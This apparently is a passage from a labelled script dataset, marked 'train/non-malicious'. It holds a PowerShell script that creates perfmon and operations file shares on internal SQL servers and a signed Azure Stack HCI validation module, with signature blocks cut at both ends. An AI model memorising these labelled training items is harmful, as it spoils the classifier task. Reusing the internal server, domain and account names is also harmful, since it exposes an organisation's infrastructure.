fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUABHHn7NCGusZz2RfVbyuwYwPykBWggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJT0swIhgPMjAyNDEwMjcyMzQ2MTlaGA8yMDI0MTAyODIzNDYxOVowdzA9 # BgorBgEEAYRZCgQBMS8wLTAKAgUA6slPSwIBADAKAgEAAgINvAIB/zAHAgEAAgIU # vzAKAgUA6sqgywIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow # CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQCt9+78tOBk # 3G7InFWNeSnv+gNf7827NofcCXCIrLQa834+WZOE6YjVcA8B4zRZWYQt61ryjsP7 # nO4QK9AT7twzBe+cVhqFCO+umtt9HILo/02fBvZqGhC0aABNMEKKtN5mHLc0RqyR # jYVeyJJgW3o+AuIAomNefMMnMlPFbCzeVx+VWfowu6aZGIf20olcJr1Udx5TxmnY # dsKjQyDDl6Lmtl54TbeWFF6Uai0RRHKqDZXeiYK0nnazQchF9LlhnVpwArQ160lu # nLrYsrAoYdqLC+X0Bz+PmzShMHudHvUpm9HSYaJSjBDw/SBZA3RVy2I0EMGwb608 # ErihFwOktb8UMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAH7y8tsN2flMJUAAQAAAfswDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgrkxGotu8 # 1scABWMF809IsSt0sg1yA8Q12Xf99Iz2v+QwgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCA52wKr/KCFlVNYiWsCLsB4qhjEYEP3xHqYqDu1SSTlGDCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB+8vLbDdn5TCVAAEA # AAH7MCIEIOcOJM95z1rtLRPImI9GcCxcLV/lXPRviSc4qDRq2ZeFMA0GCSqGSIb3 # DQEBCwUABIICAECl8dxKxl6129EuDpXuqMlVSYtLHKn0l/nFYmTD9P8JyiqpN6kI # iK1XkW1aGir3pzqySDqWvMPFT/rvuGsWwkZEJXHdZEbPJl356pxXZ1HddZcquBIM # QfUdsjb5viT08Vx2Ys7Jmlm8IC/iZkzxAQHz43Tr8eDOcBxNX1rLmZx6ksFyJd2Z # cX19wu5g0Q+rOPmfI5ZfbTBYIM8vYgZrFsjFPCvOlWn0ZG1LuNK5BNcVB686M28U # gkodiXQ9RJwg60PkKGKvrC4xaX9JJDU2Eeg7W0E8ZnUfvQvPp76/8/ejUAnwsHlA # sW/Y9HXT4yatpSNLtHElDz09tLqxSNf94yKugUmmyPNktYaEmNGMn0SiZfHaX2nz # re0Zq/Gvq8k0RERer0VvwnquwbF2xraon1sxncyB7Y9miDAvaJ0xSFVkYkhfVhaa # slj6vqX0MhoixH34f0rn0AZtfDgxL/8Yu3u8XRdZ97YsPBSEqKPRXMMMQ3C2gT9i # miDG1ctN7BPI3zfr0l0VcXJkZUOmr7+fjnfOfOQ38C7j194loTlTIU8ClI7jyen0 # MJQYfHPl/Xzt1tlA6hBKMgRXNlgGHAVZkLVuJE+cnhq1h94JfFaMp7qZihteRGRB # SxaP29fUtB7BujLmnN37Hq0eLOpuITMaxe6lRm0Sa2lEpfxZKWLISLwu # SIG # End signature block
combined_dataset/train/non-malicious/2552.ps1
2552.ps1
function SQL-Query{ param([string]$Query, [string]$SqlServer = $DEFAULT_SQL_SERVER, [string]$DB = $DEFAULT_SQL_DB, [string]$RecordSeparator = "`t" ) $conn_options = ("Data Source=$SqlServer; Initial Catalog=$DB;" + "Integrated Security=SSPI") $conn = New-Object System.Data.SqlClient.SqlConnection($conn_options) $conn.Open() $sqlCmd = New-Object System.Data.SqlClient.SqlCommand $sqlCmd.CommandTimeout = "300" $sqlCmd.CommandText = $Query $sqlCmd.Connection = $conn $reader = $sqlCmd.ExecuteReader() [array]$serverArray $arrayCount = 0 while($reader.Read()){ $serverArray += ,($reader.GetValue(0)) $arrayCount++ } $serverArray } Function New-SecurityDescriptor ( $ACEs = (throw "Missing one or more Trustees"), [string] $ComputerName = ".") { $SecDesc = ([WMIClass] "\\$ComputerName\root\cimv2:Win32_SecurityDescriptor").CreateInstance() if ($ACEs -is [System.Array]) { foreach ($ACE in $ACEs ) { $SecDesc.DACL += $ACE.psobject.baseobject } } else { $SecDesc.DACL = $ACEs } return $SecDesc } Function New-ACE ( [string] $Name = (throw "Please provide user/group name for trustee"), [string] $Domain = (throw "Please provide Domain name for trustee"), [string] $Permission = "Read", [string] $ComputerName = ".", [switch] $Group = $false) { $Trustee = ([WMIClass] "\\$ComputerName\root\cimv2:Win32_Trustee").CreateInstance() if (!$group) { $account = [WMI] "\\$ComputerName\root\cimv2:Win32_Account.Name='$Name',Domain='$Domain'" } else { $account = [WMI] "\\$ComputerName\root\cimv2:Win32_Group.Name='$Name',Domain='$Domain'" } $accountSID = [WMI] "\\$ComputerName\root\cimv2:Win32_SID.SID='$($account.sid)'" $Trustee.Domain = $Domain $Trustee.Name = $Name $Trustee.SID = $accountSID.BinaryRepresentation $ACE = ([WMIClass] "\\$ComputerName\root\cimv2:Win32_ACE").CreateInstance() switch ($Permission) { "Read" { $ACE.AccessMask = 1179817 } "Change" { $ACE.AccessMask = 1245631 } "Full" { $ACE.AccessMask = 2032127 } default { throw "$Permission is not a supported permission value. Possible values are 'Read','Change','Full'" } } $ACE.AceFlags = 3 $ACE.AceType = 0 $ACE.Trustee = $Trustee return $ACE } Function New-Share ( [string] $FolderPath = (throw "Please provide the share folder path (FolderPath)") , [string] $ShareName = (throw "Please provide the Share Name") , $ACEs , [string] $Description = "" , [string] $ComputerName = ".") { $text = "$ShareName ($FolderPath): " $SecDesc = New-SecurityDescriptor $ACEs -ComputerName $ComputerName if ( ! (GET-WMIOBJECT Win32_Share -ComputerName $ComputerName -Filter "name='$Sharename'") ) { $Share = [WMICLASS] "\\$ComputerName\Root\Cimv2:Win32_Share" $result = $Share.Create($FolderPath, $ShareName, 0, $NULL , $Description, $false , $SecDesc) } ELSE { $Share = GET-WMIOBJECT Win32_Share -ComputerName $ComputerName -Filter "name='$Sharename'" $result = $Share.SetShareInfo( $NULL, $Description, $SecDesc ) } switch ($result.ReturnValue) { 0 {$text += "has been successfully created" } 2 {$text += "Error 2: Access Denied" } 8 {$text += "Error 8: Unknown Failure" } 9 {$text += "Error 9: Invalid Name"} 10 {$text += "Error 10: Invalid Level" } 21 {$text += "Error 21: Invalid Parameter" } 22 {$text += "Error 22 : Duplicate Share"} 23 {$text += "Error 23: Redirected Path" } 24 {$text += "Error 24: Unknown Device or Directory" } 25 {$text += "Error 25: Net Name Not Found" } } $return = New-Object System.Object $return | Add-Member -type NoteProperty -name Message -value $text $return | Add-Member -type NoteProperty -name ReturnCode -value $result.ReturnValue $return } $ENV = $args[0] if ($ENV -eq $null){ $ENV = "DEN-PROD" } switch ($ENV) { "PA-PROD"{ $DBServer = "XSQLUTIL18"; $ArchiveDrive = "E" $DB = "Status"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' ORDER BY server_name "; } "PA-STAGE"{ $DBServer = "FINREP01V"; $ArchiveDrive = "E" $DB = "Status"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' ORDER BY server_name "; } "PA-IMP"{ $DBServer = "ISQLDEV610"; $ArchiveDrive = "E" $DB = "StatusStage"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' ORDER BY server_name "; } "PA-QA"{ $DBServer = "ISQLDEV610"; $ArchiveDrive = "E" $DB = "StatusIMP"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' ORDER BY server_name "; } "DEN-PROD"{ $DBServer = "sqlutil01"; $ArchiveDrive = "D" $DB = "Status"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' --AND dns_host_name LIKE 'sql%' ORDER BY server_name "; } "LOU-PROD"{ $DBServer = "sqlutil02"; $ArchiveDrive = "D" $DB = "Status"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' --AND server_name LIKE 'HOpusSQL%' --OR server_name LIKE 'SQLUTIL%' ORDER BY server_name "; } "FINALE"{ $DBServer = "FINREP01V"; $ArchiveDrive = "C" $DB = "Status"; $ServerQuery = "SELECT server_name , domain , ip_address , dns_host_name , perfmon_path , perfmon_drive , perfmon_start_time , perfmon_end_time FROM t_server s INNER JOIN t_server_properties sp ON s.server_id = sp.server_id INNER JOIN t_perfmon_properties pp ON s.server_id = pp.server_id WHERE Active = '1' --AND server_name LIKE 'FinRep%' ORDER BY server_name "; } } $ArchiveIPQuery = "SELECT ip_address FROM t_server_properties where server_id = (select server_id from t_server where server_name = '$DBServer')" $OperationsSharename = "Operations" $PerfmonLogsShareName = "PerfmonLogsArchive" $title = "PerfmonCollector" $Servers = ( Invoke-SQLCmd -query $ServerQuery -Server $DBServer -Database $DB ) $ArchiveIP = ( Invoke-SQLCmd -query $ArchiveIPQuery -Server $DBServer -Database $DB | Select-Object ip_address) $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().name if ( $domain -eq "mortgagecadence.internal" ) { $DUACE = New-ACE -Name "Domain Users" -Domain MC -Permission Read -Group $PerfmonACE = New-Ace -Name svc_perfmon -Domain MC -Permission Full $mmessanoACE = New-Ace -Name mm_admin -Domain MC -Permission Full $jmckayACE = New-Ace -Name jmckay -Domain MC -Permission Full $rhaagACE = New-Ace -Name rhaag -Domain MC -Permission Full $tdodsonACE = New-Ace -Name tdodson -Domain MC -Permission Full $sbrownACE = New-Ace -Name sbrown -Domain MC -Permission Full $jfalconerACE = New-Ace -Name jf_admin -Domain MC -Permission Full $MCACES = ($DUACE,$PerfmonACE,$mmessanoACE,$jmckayACE,$rhaagACE,$tdodsonACE,$sbrownACE,$jfalconerACE) } ELSEIF ( $domain -eq "mcfinale.net" ) { $DUACE = New-ACE -Name "Domain Users" -Domain MCFinale -Permission Read -Group $PerfmonACE = New-Ace -Name svc_perfmon -Domain MCFinale -Permission Full $mmessanoACE = New-Ace -Name mm_admin -Domain MCFinale -Permission Full $jmckayACE = New-Ace -Name jm_admin -Domain MCFinale -Permission Full $rhaagACE = New-Ace -Name rh_admin -Domain MCFinale -Permission Full $tdodsonACE = New-Ace -Name td_admin -Domain MCFinale -Permission Full $sbrownACE = New-Ace -Name sb_admin -Domain MCFinale -Permission Full $jfalconerACE = New-Ace -Name jf_admin -Domain MCFinale -Permission Full $MCACES = ($DUACE,$PerfmonACE,$mmessanoACE,$jmckayACE,$rhaagACE,$tdodsonACE,$sbrownACE,$jfalconerACE) } foreach ($Server in $Servers) { if ($Server -ne $null) { $ServerName = $($Server.dns_host_name) $ServerIPAddress = $($Server.ip_address) $PerfmonDrive = $($Server.perfmon_drive) $OldPerfLogsDir = "\\" + $ServerIPAddress + "\" + $PerfmonDrive + "$\" + "PerfmonLogs" $OperationsLocalPath = $PerfmonDrive + ":\" + $OperationsSharename $PerfmonLogsArchiveLP = $ArchiveDrive + ":\" + $PerfmonLogsShareName $ArchiveDir = "\\" + $ArchiveIP.ip_address + "\" + $PerfmonLogsShareName + "\" + $ServerName + "\" $PerfmonLogsArchive = "\\" + $DBServer + "\" + $ArchiveDrive + "$\" + $PerfmonLogsShareName $OperationsRoot = "\\" + $ServerIPAddress + "\" + $PerfmonDrive + "$\" + $OperationsSharename Write-Host "----- Begin $ServerName. -----" if ( Test-Path -Path $OldPerfLogsDir ) { Write-Host "Removing old PerfmonLogs directory." Remove-Item -path $OldPerfLogsDir } if (!(Test-Path -path $OperationsRoot)) { Write-Host "Creating directories." New-Item -Path $OperationsRoot -type directory if (!( Test-Path -path ($OperationsRoot + "\Logs") )) { New-Item -Path ($OperationsRoot + "\Logs") -type directory } if (!( Test-Path -path ($OperationsRoot + "\Support") )) { New-Item -Path ($OperationsRoot + "\Support") -type directory } if (!( Test-Path -path ($OperationsRoot + "\Support\Perfmon") )) { New-Item -Path ($OperationsRoot + "\Support\Perfmon") -type directory } } ELSE { Write-Host "Operations directory exists, checking for sub-directories." if (!( Test-Path -path ($OperationsRoot + "\Logs") )) { New-Item -Path ($OperationsRoot + "\Logs") -type directory } if (!( Test-Path -path ($OperationsRoot + "\Bin") )) { New-Item -Path ($OperationsRoot + "\Bin") -type directory } if (!( Test-Path -path ($OperationsRoot + "\SSIS") )) { New-Item -Path ($OperationsRoot + "\SSIS") -type directory } if (!( Test-Path -path ($OperationsRoot + "\Support") )) { New-Item -Path ($OperationsRoot + "\Support") -type directory } if (!( Test-Path -path ($OperationsRoot + "\Support\Perfmon") )) { New-Item -Path ($OperationsRoot + "\Support\Perfmon") -type directory } } New-Share -FolderPath $OperationsLocalPath -ShareName $OperationsShareName -Computer $ServerName -ACEs $MCACES if ( $($Server.server_name) -eq $DBServer ) { if (!(Test-Path -path $PerfmonLogsArchive)) { New-Item -Path $PerfmonLogsArchive -type directory } New-Share -FolderPath $PerfmonLogsArchiveLP -ShareName $PerfmonLogsShareName -Computer $ServerName -ACEs $MCACES } if (!(Test-Path -path $ArchiveDir)) { New-Item $ArchiveDir -type directory } Write-Host "----- End $ServerName. -----" Write-Host "" } }
combined_dataset/train/non-malicious/sample_58_1.ps1
sample_58_1.ps1
<############################################################# # # # Copyright (C) Microsoft Corporation. All rights reserved. # # # #############################################################> $MetaData = @{ "OperationType" = @("Deployment", "Upgrade", "AddNode") "UIName" = 'Azure Stack HCI MOCStack' "UIDescription" = 'Check MOC Stack requirements' } function Test-AzStackHciMOCStack { param ( [parameter(Mandatory = $true)] [ValidateNotNullOrEmpty()] $Parameters, [parameter(Mandatory = $true)] [ValidateSet('Deployment', 'Upgrade', 'PreUpdate', 'AddNode')] $OperationType, [parameter(Mandatory = $false)] [switch] $FailFast ) try { $ENV:EnvChkrOp = $OperationType if ($OperationType -match 'Deployment|PreUpdate|Upgrade|AddNode') { [array]$MOCStackResult if ($OperationType -eq 'Upgrade') { # During upgrade ECE has insufficient details for remote sessions # Make local session to this node $PsSession = New-PsSession } else { $PsSession = [EnvironmentValidator]::NewPsSessionAllHosts($Parameters) } $params = @{ PsSession = $PsSession OperationType = $OperationType PassThru = $true OutputPath = "$($env:LocalRootFolderPath)\MASLogs\" } if ((Get-WmiObject -Class Win32_ComputerSystem).Model -eq "Virtual Machine") { Trace-Execution "Test-MOCStackCPUCore is skipped for virtual Azure Stack HCI environments." $params += @{ Exclude = 'Test-MOCStackCPUCore' } } Trace-Execution "Starting MOCStack validation, detail output can be found in $($outputPath)\AzStackHciEnvironmentChecker*" $MOCStackResult = Invoke-AzStackHciMOCStackValidation @params <# Example for CI supress MOCStack exception if (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\SQMClient -Name IsCIEnv -ErrorAction SilentlyContinue) { Trace-Execution "CI Environment. Suppress MOCStack volume" $MOCStackResult | Where-Object Name -eq 'AzStackHci_MOCStack_Volume' | Add-Member -NotePropertyName Severity -NotePropertyValue 'WARNING' -Force }#> # Parse MOCStack Result [EnvironmentValidator]::ParseResult($MOCStackResult, 'MOCStack', $FailFast) } else { Trace-Execution "No interface found for $OperationType" } } catch { Trace-Execution "Validator failed. $_" Trace-Execution "$($_.ScriptStackTrace)" throw $_ } finally { if ($PsSession) { $PsSession | Microsoft.PowerShell.Core\Remove-PSSession } } } Export-ModuleMember -Function Test-AzStackHciMOCStack -Variable MetaData # SIG # Begin signature block # MIIoKQYJKoZIhvcNAQcCoIIoGjCCKBYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBRSRan2ccFfJHD # qCim5lN/7iBgjbgRMNBKqa8tXS88S6CCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgkwghoFAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIJzkahekbkbl57blyMfw2YuJ # 8NO+4AODlOCYIyHIyW86MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAN2TotZT23g9IAvsFeyHBxI6IddIIKOcZhy4V4dFUUCElO+NEZigupqHr # OTK8lIOjT22Bf0I81qXP79Yjblj28HHHUnmotqLDEK72GkZQA6/cKxt40VwR5ARW # OaOwMWJx9L5khalLSfgnZ1nPcjxXb9uZDyq4884SWZ023KbR6dkR97ud18t+Ht8g # 6/qs/hsT2tfb1vFlJyNx57vwGd8xrv8CD3SGm+ZeDU6HfFaGA5oLVCEDUUUVC6Xt # 